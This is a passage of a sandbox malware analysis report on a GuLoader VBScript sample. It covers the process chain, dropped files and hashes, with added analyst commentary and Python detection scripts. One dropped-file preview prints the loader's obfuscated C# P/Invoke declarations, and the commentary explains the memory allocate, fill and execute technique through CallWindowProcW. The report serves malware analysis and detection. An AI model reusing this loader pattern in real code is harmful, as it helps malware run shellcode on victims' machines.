    MITRE ATT&CK matrix (flattened during extraction; the per-technique hit counts were fused with neighbouring cells and cannot be recovered). Tactic columns: Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Exfiltration, Command and Control, Network Effects, Remote Service Effects, Impact.

    Techniques shown with a hit count, by tactic:

    • Execution: Command and Scripting Interpreter, Scripting, PowerShell
    • Privilege Escalation: Process Injection
    • Defense Evasion: Masquerading, Virtualization/Sandbox Evasion, Process Injection, Deobfuscate/Decode Files or Information, Scripting, Obfuscated Files or Information
    • Discovery: Query Registry, Security Software Discovery, Process Discovery, Virtualization/Sandbox Evasion, Application Window Discovery, File and Directory Discovery, System Information Discovery
    • Collection: Archive Collected Data
    • Command and Control: Encrypted Channel, Application Layer Protocol

    All other matrix cells are unmarked techniques with no hits for this sample.

    Behavior Graph ID: 562140    Sample: IMG 0045434.vbs    Startdate: 28/01/2022    Architecture: WINDOWS    Score: 88
    Top-level signatures: Found malware configuration; Yara detected GuLoader; Potential malicious VBS script found (suspicious strings); 2 other signatures
    Process tree:
    • wscript.exe 2, started. Signatures: VBScript performs obfuscated calls to suspicious functions; Wscript starts Powershell (via cmd or directly); Very long command line found; Encrypted powershell cmdline option found
      • powershell.exe 25, started
        • csc.exe 3, started. Dropped file: C:\Users\user\AppData\Local\...\ridmj1ad.dll, PE32
          • cvtres.exe 1, started
        • conhost.exe, started

    Source: IMG 0045434.vbs    Detection: 2%    Scanner: Virustotal
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    Source: http://pesterbdd.com/images/Pester.png    Detection: 0%    Scanner: URL Reputation    Label: safe
    Source: https://contoso.com/    Detection: 0%    Scanner: URL Reputation    Label: safe
    Source: https://contoso.com/License    Detection: 0%    Scanner: URL Reputation    Label: safe
    Source: https://contoso.com/Icon    Detection: 0%    Scanner: URL Reputation    Label: safe
    No contacted domains info
    NameMaliciousAntivirus DetectionReputation
    https://onedrive.live.com/download?cidOfalse
      high
    Name: http://nuget.org/NuGet.exe    Source: powershell.exe, 00000003.00000002.1184479242.0000000006014000.00000004.00000800.00020000.00000000.sdmp    Malicious: false    Reputation: high
    Name: http://pesterbdd.com/images/Pester.png    Source: powershell.exe, 00000003.00000002.1180651928.00000000050F7000.00000004.00000800.00020000.00000000.sdmp    Malicious: false    Antivirus Detection: URL Reputation: safe    Reputation: unknown
    Name: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name    Source: powershell.exe, 00000003.00000002.1180399057.0000000004FB1000.00000004.00000800.00020000.00000000.sdmp    Malicious: false    Reputation: high
    Name: http://www.apache.org/licenses/LICENSE-2.0.html    Source: powershell.exe, 00000003.00000002.1180651928.00000000050F7000.00000004.00000800.00020000.00000000.sdmp    Malicious: false    Reputation: high
    Name: https://github.com/Pester/Pester    Source: powershell.exe, 00000003.00000002.1180651928.00000000050F7000.00000004.00000800.00020000.00000000.sdmp    Malicious: false    Reputation: high
    Name: https://contoso.com/    Source: powershell.exe, 00000003.00000002.1184479242.0000000006014000.00000004.00000800.00020000.00000000.sdmp    Malicious: false    Antivirus Detection: URL Reputation: safe    Reputation: unknown
    Name: https://nuget.org/nuget.exe    Source: powershell.exe, 00000003.00000002.1184479242.0000000006014000.00000004.00000800.00020000.00000000.sdmp    Malicious: false    Reputation: high
    Name: https://contoso.com/License    Source: powershell.exe, 00000003.00000002.1184479242.0000000006014000.00000004.00000800.00020000.00000000.sdmp    Malicious: false    Antivirus Detection: URL Reputation: safe    Reputation: unknown
    Name: https://contoso.com/Icon    Source: powershell.exe, 00000003.00000002.1184479242.0000000006014000.00000004.00000800.00020000.00000000.sdmp    Malicious: false    Antivirus Detection: URL Reputation: safe    Reputation: unknown
                No contacted IP infos
                Joe Sandbox Version:34.0.0 Boulder Opal
                Analysis ID:562140
                Start date:28.01.2022
                Start time:14:49:30
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 9m 31s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:IMG 0045434.vbs
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of new started processes analysed:17
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal88.troj.evad.winVBS@8/11@0/0
                EGA Information:
                • Successful, ratio: 100%
                HDC Information:Failed
                HCA Information:
                • Successful, ratio: 99%
                • Number of executed functions: 11
                • Number of non-executed functions: 2
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .vbs
                • Override analysis time to 240s for JS files taking high CPU consumption
                • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                • Not all processes were analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                Time: 14:51:47    Type: API Interceptor    Description: 62x Sleep call for process: powershell.exe modified
                No context
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):8003
                Entropy (8bit):4.842774286652891
                Encrypted:false
                SSDEEP:192:Jxoe5FVsm5emdgdVFn3eGOVpN6K3bkkjo5igkjDt4iWN3yBGHc9smgdcU6CupO0P:1EdVoGIpN6KQkj2Zkjh4iUxepib4J
                MD5:62F0B7274EE33977F05FE8727590EBA4
                SHA1:3D7D56215FAF3C0F11BBF6A16ABB09DF83E96BA7
                SHA-256:A59280899B286228ABA87CAC2EED2C3FEA4966BF427899B9B9AEF46AD0FD3E00
                SHA-512:001B11A26D8AF5D8FEE3B259D5E10EAA22801662C539BA70B7EBA0A330C9DD1B4F0CFB3B05B0B63CDA103B771506CF7A35A581DF7986E872A187E2E280D5493C
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:PSMODULECACHE.............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script................T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                Category:dropped
                Size (bytes):1328
                Entropy (8bit):3.980586000283681
                Encrypted:false
                SSDEEP:24:HWne9E2+f0vxkmfHLhKEbsmfWI+ycuZhNuHakS/QPNnq9qd:OC1KPm+1ul8a3Aq9K
                MD5:2D4DEC5C4723CFB91B42D0878129B2B1
                SHA1:F2CE468A7D955440C7372ADFC30A881984FCC7C7
                SHA-256:1D72247C3E3DABEA2E821EAD878301EEF76AD2CDBEA456D45E6FC6B5432D2647
                SHA-512:CD266BF5354D2B4CC8AF232A5EC272CCE7EE88F9CA66829887385FB54B61C2F06AD05C62A5293F3DA2726F890AA42E5849361C25288350779E21F22D6097A4A7
                Malicious:false
                Reputation:low
                Preview:L......a.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\ridmj1ad\CSC3DE241659FC44F82A3F695B8E7FD432F.TMP..................'.....N..#..........3.......C:\Users\user\AppData\Local\Temp\RES7F9.tmp.-.<...................'...Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...r.i.d.m.j.1.a.d...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                Process:C:\Windows\System32\wscript.exe
                File Type:data
                Category:dropped
                Size (bytes):54731
                Entropy (8bit):6.808354912776216
                Encrypted:false
                SSDEEP:768:L3QU7awMz32kQXkifR/FQc1aOCLDh9/zkW8jjPtC0qPEoB1:LH83XifVWc1aFrAWWznx21
                MD5:2A22122630F746A9315DE8C7FB00EB92
                SHA1:B6DDB9ABE5B0DF63FE74E226F398C0A9EC1A73AE
                SHA-256:994CD060E9D46E82EB631262C8867E403C863AD3B008BEAE9D3C636DE172A053
                SHA-512:6F583D3D898BD31103DE0A567EA3735401F8530E15B2960D0F88F86625FA8AF172EBA9496D6353EEBBA794B3D50D1042D9E4FD375FD630023B90EA7EF4F7DA04
                Malicious:false
                Reputation:low
                Preview:.o.....@..\................................................................r...]g.5w/////////////////////////////////////////////////////////////////////////////////////////......f.s....C.6O"...............................................................h.d......`.w.4||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||.4$m/[d....Gd.><....................................................................,$/.>......B...S..............................................................Zf.q.....N.=2`...................................................................................S}a.p.....................................................................................EO7..................................................................._....o..K?..G.......................................................................1......>.@Qn9999999999999999999999999999999999999999999999999999999999.e.f.s..O..nZPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:U:U
                MD5:C4CA4238A0B923820DCC509A6F75849B
                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                Malicious:false
                Reputation:high, very likely benign file
                Preview:1
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:U:U
                MD5:C4CA4238A0B923820DCC509A6F75849B
                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                Malicious:false
                Preview:1
                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                File Type:MSVC .res
                Category:dropped
                Size (bytes):652
                Entropy (8bit):3.0901327563417746
                Encrypted:false
                SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryEHak7Ynqq/QPN5Dlq5J:+RI+ycuZhNuHakS/QPNnqX
                MD5:AAF9D1A227CBB70DF106E14EEE93D023
                SHA1:16F2F5143E08845C709A498AABC9C03BA8818477
                SHA-256:9D3004CB5E77089E2175604201DA681D020E4385DA1A5310B980A6B33455BC55
                SHA-512:8CF0759F7EE93A45B602D2DC59A50E4CDCD389D90E62871B887DB01722DCFF65C4DAAF95DB6C1D1F90745E792E7B6ECCECC72BBD806F01D477EB7E094A599AC4
                Malicious:false
                Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...r.i.d.m.j.1.a.d...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...r.i.d.m.j.1.a.d...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                Category:dropped
                Size (bytes):725
                Entropy (8bit):5.0360659051782966
                Encrypted:false
                SSDEEP:12:V/DGrcXvLZCGNVulF4fVtKMLr3F8aKGWJVIyLq+OwQiP2IE0wn:JocXvLZCGLuwNpr3F8rGiWP+QL
                MD5:9B3EA1C2DE62E6D7ED2BFCC1920981F2
                SHA1:74BCDC2E2BBFFBE1482E6F04EC22F99397CE6823
                SHA-256:8D956F943B2F42AD00C23891D7B9A19A423140B88962345019B920EF1C3BC690
                SHA-512:805C137EF0A218A5400B8D005603A80E5B9F8965CA2C7F618AC65923BB08812F1D922DCE4CACD3E882E8F72947D5C2B661AB1F644A4512CCDEB02AD04AB09D02
                Malicious:false
                Preview:.using System;..using System.Runtime.InteropServices;..public static class Sludrech1..{..[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Sludrech6,ref Int32 VERSALERN,int Forbistrin,ref Int32 Sludrech,int Refrman,int Sludrech7);..[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string Monstr,uint Melle8,int Nonpercep,int Sludrech0,int HABAN,int BAAN,int NRINGS);..[DllImport("kernel32.dll")]public static extern int ReadFile(int Forbistrin0,uint Forbistrin1,IntPtr Forbistrin2,ref Int32 Forbistrin3,int Forbistrin4);..[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr Forbistrin5,int Forbistrin6,int Forbistrin7,int Forbistrin8,int Forbistrin9);..}
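The four P/Invoke declarations in this dropped .cs file form an allocate / fill / execute chain: NtAllocateVirtualMemory obtains a buffer, CreateFileA and ReadFile fill it from a file on disk, and CallWindowProcW is handed the buffer as a "window procedure", so user32 transfers control into it without any thread-creation API in the import set. The class and parameter names (Sludrech1, Forbistrin0, VERSALERN) are throw-away obfuscation, so a detection should key on the imported function names, not on strings. Handles and pointers are declared as int, which only works in a 32-bit process; that matches the SysWOW64 powershell.exe in the process list. As an added example, not part of this report, the Python below parses DllImport declarations out of an Add-Type source and flags the allocate-plus-execute combination; the dropped source is re-flowed from the preview above, while the benign control sample and the capability lists are my own assumptions.

```python
"""Static triage of a dropped Add-Type source (the ridmj1ad.0.cs pattern above).

Added example, not part of the sandbox report. DROPPED_CS is re-flowed from the
report's preview; BENIGN_CS and the capability lists are constructed assumptions.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Re-flowed from the preview above ('..' in the preview are CRLF line breaks).
DROPPED_CS = r'''
using System;
using System.Runtime.InteropServices;
public static class Sludrech1
{
[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Sludrech6,ref Int32 VERSALERN,int Forbistrin,ref Int32 Sludrech,int Refrman,int Sludrech7);
[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string Monstr,uint Melle8,int Nonpercep,int Sludrech0,int HABAN,int BAAN,int NRINGS);
[DllImport("kernel32.dll")]public static extern int ReadFile(int Forbistrin0,uint Forbistrin1,IntPtr Forbistrin2,ref Int32 Forbistrin3,int Forbistrin4);
[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr Forbistrin5,int Forbistrin6,int Forbistrin7,int Forbistrin8,int Forbistrin9);
}
'''

# Constructed benign control: the kind of single import an admin script declares.
BENIGN_CS = r'''
using System.Runtime.InteropServices;
public static class Native {
    [DllImport("kernel32.dll", SetLastError = true)] public static extern uint GetTickCount();
}
'''

# Capability buckets (assumed lists). EXECUTE includes callback-taking APIs such as
# CallWindowProcW and EnumWindows, which run a caller-supplied pointer without any
# thread-creation API appearing in the import set.
ALLOCATE = {"NtAllocateVirtualMemory", "VirtualAlloc", "VirtualAllocEx",
            "NtProtectVirtualMemory", "VirtualProtect", "VirtualProtectEx"}
READ_PAYLOAD = {"CreateFileA", "CreateFileW", "ReadFile", "NtReadFile",
                "URLDownloadToFileA", "URLDownloadToFileW", "InternetReadFile"}
EXECUTE = {"CallWindowProcA", "CallWindowProcW", "EnumWindows", "EnumChildWindows",
           "EnumDesktopWindows", "EnumSystemLocalesA", "EnumSystemLocalesW",
           "CreateThread", "CreateRemoteThread", "NtCreateThreadEx", "QueueUserAPC"}

# One DllImport attribute followed by its extern declaration; tolerates the
# whitespace-free layout of the dropped file and extra attribute arguments.
_IMPORT_RE = re.compile(
    r'\[DllImport\(\s*"(?P<lib>[^"]+)"[^\]]*\]\s*'
    r'(?:public|private|internal|static|extern|unsafe|\s)+'
    r'(?P<ret>[\w.<>\[\]]+)\s+(?P<name>\w+)\s*\(',
    re.IGNORECASE)


@dataclass(frozen=True)
class Import:
    library: str
    name: str
    return_type: str


def parse_dllimports(source: str) -> list[Import]:
    """Extract (library, function, return type) for every P/Invoke declaration."""
    return [Import(m["lib"].lower(), m["name"], m["ret"])
            for m in _IMPORT_RE.finditer(source)]


def classify(imports: list[Import]) -> dict[str, list[str]]:
    """Bucket the imported function names by the loader capability they provide."""
    names = {i.name for i in imports}
    return {"allocate": sorted(names & ALLOCATE),
            "read_payload": sorted(names & READ_PAYLOAD),
            "execute": sorted(names & EXECUTE)}


def triage(source: str) -> dict:
    """Verdict keyed on the import set, so renamed classes and parameters do not matter."""
    imports = parse_dllimports(source)
    caps = classify(imports)
    # The loader pattern is the conjunction: obtain writable memory, then make
    # something jump into it. A payload-read API strengthens but is not required.
    verdict = "loader-pattern" if caps["allocate"] and caps["execute"] else "no-loader-pattern"
    return {"imports": imports, "capabilities": caps, "verdict": verdict}


if __name__ == "__main__":
    for label, src in (("dropped", DROPPED_CS), ("benign", BENIGN_CS)):
        result = triage(src)
        print(label, result["verdict"], result["capabilities"])
```

The same parser can be pointed at the PowerShell transcript instead of the dropped .cs, since Add-Type receives the identical text as a here-string. What this report does not show is the PowerShell body itself, so which file CreateFileA opens is still to be confirmed from the decoded -EncodedCommand; the 54,731-byte "data" file dropped by wscript.exe is the obvious candidate to check first.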
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                Category:dropped
                Size (bytes):369
                Entropy (8bit):5.2038505371770345
                Encrypted:false
                SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fX0zxs7+AEszIwkn23fhn:p37Lvkmb6KRf/0WZEif5
                MD5:13C5ECEB34F1162659388A026B5954AB
                SHA1:CCCF23AF00B608EFCE3ECDCA53FB64190A5D5C3C
                SHA-256:A24EECC37DC4C8A09BA7DE54836FC8E0D4F3D6621CFC03A43616066EF2DF2660
                SHA-512:2D7EF632251B60970A862737DEA98831FA04DB3EA8F42F08D3CE7F0515D8A41659A152F4EBE63069F3B0DA40CD2294A3047300562894209AFC884F6574DBD487
                Malicious:false
                Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ridmj1ad\ridmj1ad.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ridmj1ad\ridmj1ad.0.cs"
                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):3584
                Entropy (8bit):3.141216582894879
                Encrypted:false
                SSDEEP:24:etGSxtoDTc8cTyqvCxCIhw0r2ZIpHUXStkFk9JboWI+ycuZhNuHakS/QPNnq:6QPvcTja8IhHNQFk9JbD1ul8a3Aq
                MD5:BF5173E64D389BA33EB61E55BD540B26
                SHA1:B9994722FF68B36F1EE57725519C0A67FEDECC47
                SHA-256:36C97105DB819B02B4200DEE2FBBEB5818C51825AB7AF42E22F686115AC1402D
                SHA-512:9F727F4C557B6EA2F5A2609F2D602A5AAEF7945CD2C614B32868594C2B4648D9487B0E18A6C96D7C5AF0A37B88E3686D6F406AAF2987872027755F0706580A6C
                Malicious:false
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a...........!................^%... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................@%......H.......P ..............................................................BSJB............v4.0.30319......l.......#~.. .......#Strings....<.......#US.D.......#GUID...T...l...#Blob...........G.........%3............................................................1.*...{.[.....[.......................................... 8............ P............ \.!.......... e.+.......u.............................................................................................................
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                Category:modified
                Size (bytes):867
                Entropy (8bit):5.3085948882487175
                Encrypted:false
                SSDEEP:24:KJBqd3ka6KRf/VEif8KaM5DqBVKVrdFAMBJTH:Cika6C/VEu8KxDcVKdBJj
                MD5:1B0F69F4D7FD225D9C87C165866DE451
                SHA1:F62390DBB4346456CF96500794AF7BC2DAAAF268
                SHA-256:F28D13187C40979DF4795998DBDCC08C5C4E807725EE4840DD0CAB8DB5D08D4F
                SHA-512:9C07D46E45C7EAE44FAE5939A7C7244137DBF9597086B6BB91F94D5BE39FDD2E3B73F79876ED722F210978FE1A1F9DBC54134CB54D9C10C41D40FFCE99D20EC2
                Malicious:false
                Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ridmj1ad\ridmj1ad.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ridmj1ad\ridmj1ad.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                Category:dropped
                Size (bytes):10897
                Entropy (8bit):5.12693841528302
                Encrypted:false
                SSDEEP:192:dpW1kgUKMdFduG9JfKj2bpFpgBA8dPANoJThV8X1XxtYwYs6qfBCRY0y92:dY1UK0zuWfKqbpFpgy8dPANoJThyX1AJ
                MD5:F837CD661E667C3EDE2ABF38FAA3B704
                SHA1:32FF94D3217EDDEB58E01DFF6F216E6884D5529E
                SHA-256:F5550BB25EF1B9E39D91784A026455DB44628953DBD6096B2756058D1758E845
                SHA-512:3DEABE504BA3B5D7774D8C5E9238EE9F224758BCB27CBEC23E56A5F6D314B5DE53C387D0B34A6B1F55C5782F1CA4DBC6189435F64870273372DD45C52BF27C67
                Malicious:false
                Preview:.**********************..Windows PowerShell transcript start..Start time: 20220128145133..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 715575 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -EncodedCommand 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
                File type:ASCII text, with CRLF line terminators
                Entropy (8bit):4.634802658157138
                TrID:
                • Visual Basic Script (13500/0) 100.00%
                File name:IMG 0045434.vbs
                File size:151564
                MD5:813117cdcd80979365fd6d9586d11e4a
                SHA1:e28ef2705053405e87f440f078f31d13b09a9ee3
                SHA256:1def093ef16309c10c38b5426ac396019c4ddc074394b022626b8dce1ea2acaa
                SHA512:937b8defc5c8fa7661ea2431f768d38276f7ca44bbd3c729a755c3f84806dbbb8905b3187ebc419995fdfa9fa1f9699b8dbda037b4eff817a91e6744f019885c
                SSDEEP:3072:ycs/Z4IREvusFyK3tzh6QM+dNIeWwXXX3QsiXXXXXXXXXXXXXXXXXXXvXXXXXX/J:yzCusn97KR7
                File Content Preview:'Term Glossarian Hauber indta colorado Torsimeter Uniso Streeter1 Count9 SAMURAIEN STVEKLUD Hyrernemet5 Produ1 Enrobed2 Troljer8 ..'Unobesene2 GLANDI OPFAND Skaldyrs Pretr1 HAMR TETRAMA Lett Tirle Inoc Stagsupe2 ADRESSERIN dephlegm evenly LOVLIGHEDF Barto
                Icon Hash:e8d69ece869a9ec4
                No network behavior found

                Target ID:1
                Start time:14:50:19
                Start date:28/01/2022
                Path:C:\Windows\System32\wscript.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\IMG 0045434.vbs"
                Imagebase:0x7ff7ba5d0000
                File size:163840 bytes
                MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:3
                Start time:14:50:56
                Start date:28/01/2022
                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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
                Imagebase:0x120000
                File size:430592 bytes
                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Yara matches:
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000002.1189973609.00000000098B0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                Reputation:high

                Target ID:4
                Start time:14:50:57
                Start date:28/01/2022
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff724c50000
                File size:625664 bytes
                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:12
                Start time:14:52:01
                Start date:28/01/2022
                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ridmj1ad\ridmj1ad.cmdline
                Imagebase:0xc90000
                File size:2170976 bytes
                MD5 hash:350C52F71BDED7B99668585C15D70EEA
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Reputation:moderate

                Target ID:13
                Start time:14:52:02
                Start date:28/01/2022
                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7F9.tmp" "c:\Users\user\AppData\Local\Temp\ridmj1ad\CSC3DE241659FC44F82A3F695B8E7FD432F.TMP"
                Imagebase:0x870000
                File size:43176 bytes
                MD5 hash:C09985AE74F0882F208D75DE27770DFA
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate
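The process list is the chain the signatures describe: wscript.exe (Target 1) starts a SysWOW64 powershell.exe with -EncodedCommand (Target 3), which runs csc.exe against a .cmdline file under %LOCALAPPDATA%\Temp (Target 12) and cvtres.exe for the resource stub (Target 13). csc.exe and cvtres.exe launched this way are the normal footprint of PowerShell's Add-Type, so the detection signal is the lineage and the source folder, not the compiler itself, and the -EncodedCommand argument has to be decoded (base64 over UTF-16LE) before any rule can see the Add-Type text inside it. As an added example, not from the report, the Python below runs exactly that logic over constructed process-creation events modelled on the list; the PIDs of csc/cvtres, the parent of wscript.exe, the encoded payload (the report redacts the real one), the benign control event and the field names are assumptions.

```python
"""Lineage detection for the wscript -> powershell -EncodedCommand -> csc/cvtres chain.

Added example, not part of the sandbox report. EVENTS are constructed to mirror the
report's process list; the csc/cvtres PIDs, wscript's parent, the encoded payload
and the event field names are assumptions for the demonstration.
"""
from __future__ import annotations

import base64
import re
from dataclasses import dataclass


@dataclass
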